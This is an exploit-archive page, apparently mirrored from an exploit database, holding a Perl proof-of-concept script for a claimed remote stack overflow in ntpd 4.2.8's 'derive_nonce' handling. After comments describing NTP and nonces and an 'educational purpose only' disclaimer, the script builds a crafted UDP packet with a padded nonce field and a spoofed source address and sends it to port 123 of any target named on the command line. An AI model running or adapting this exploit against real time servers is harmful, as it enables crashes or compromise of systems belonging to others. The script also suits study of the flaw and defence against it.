Linux ntpd 4.2.8 derive_nonce Stack Overflow
Posted on 30 November -0001
<HTML><HEAD><TITLE>Linux ntpd 4.2.8 derive_nonce Stack Overflow</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>#!/usr/bin/perl # # Linux ntpd 4.2.8 'derive_nonce' remote stack overflow PoC # # Copyright 2016 (c) Todor Donev # todor.donev@gmail.com # https://www.ethical-hacker.org/ # https://www.facebook.com/ethicalhackerorg # http://pastebin.com/u/hackerscommunity # # # Description: # The ntpd program is an operating-system daemon that sets and maintains # a computer system's system time in synchronization with Internet-standard # time servers. It is a complete implementation of the Network Time Protocol # (NTP) version 4, but retains compatibility with versions 1, 2, and 3. # ntpd uses a single configuration-file to run the daemon in server and/or # client modes. The configuration file, usually named ntp.conf, is located # in the /etc directory. Other important files include the drift file, which # ntpd uses to correct for hardware-clock skew in the absence of a connection # to a more accurate upstream time-server. # # Nonce is an arbitrary number that may only be used once. It is similar in # spirit to a nonce word, hence the name. It is often a random or pseudo-random # number issued in an authentication protocol to ensure that old communications # cannot be reused in replay attacks. They can also be useful as initialization # vectors and in cryptographic hash function. A nonce is an arbitrary number used # only once in a cryptographic communication, in the spirit of a nonce word. # They are often random or pseudo-random numbers. Many nonces also include a # timestamp to ensure exact timeliness, though this requires clock synchronization # between organizations. The addition of a client nonce ("cnonce") helps to improve # the security in some ways as implemented in digest access authentication. To ensure # that a nonce is used only once, it should be time-variant (including a suitably # fine-grained timestamp in its value), or generated with enough random bits to ensure # a probabilistically insignificant chance of repeating a previously generated value. # Some authors define pseudo-randomness (or unpredictability) as a requirement for a # nonce. # # Disclaimer: # This or previous program is for Educational purpose ONLY. Do not # use it without permission. The usual disclaimer applies, especially # the fact that Todor Donev is not liable for any damages caused by # direct or indirect use of the information or functionality provided # by these programs. The author or any Internet provider bears NO # responsibility for content or misuse of these programs or any # derivatives thereof. By using these programs you accept the fact # that any damage (dataloss, system crash, system compromise, etc.) # caused by the use of these programs is not Todor Donev's # responsibility. # # Use at your own risk and educational purpose ONLY! # # Thanks to Maya Hristova and all my friends that support me. # # Suggestions,comments and job offers are welcome! # # use Net::RawIP; print "[ Linux ntpd 4.2.8 'derive_nonce' remote stack overflow PoC "; print "[ ====== "; print "[ Usg: $0 <target> "; print "[ Example: perl $0 133.71.33.7 "; print "[ ====== "; print "[ <todor.donev@gmail.com> Todor Donev "; print "[ Facebook: https://www.facebook.com/ethicalhackerorg "; print "[ Website: https://www.ethical-hacker.org/ "; my $target = $ARGV[0]; my $data = "x26x0ax00x00x00x00x00x00x00x00x00x05x6ex6fx6ex63x65x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"; my $sock = new Net::RawIP({ udp => {} }) or die; $sock->set({ ip => { saddr => "192.168.1.1", daddr => $target}, udp => { source, => 31337, dest => 123 , data => $data}}); $sock->send; </BODY></HTML>